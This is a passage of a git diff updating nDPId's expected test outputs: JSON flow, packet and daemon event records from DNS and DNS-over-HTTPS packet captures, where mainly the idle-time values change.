00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -144,7 +144,7 @@ 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":59,"total-skipped-flows":0,"total-l4-data-len":17861,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":148,"global_ts_msec":1560869916477} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 66/59 diff --git a/test/results/dnscrypt-v2-doh.pcap.out b/test/results/dnscrypt-v2-doh.pcap.out index 9ad95e3b1..8a7b80c9a 100644 --- a/test/results/dnscrypt-v2-doh.pcap.out +++ b/test/results/dnscrypt-v2-doh.pcap.out @@ -1,245 +1,245 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946739298533} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+7CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRvmqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3ddZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P4Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6VhykmmEfKtsuoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8PkzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN2QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiY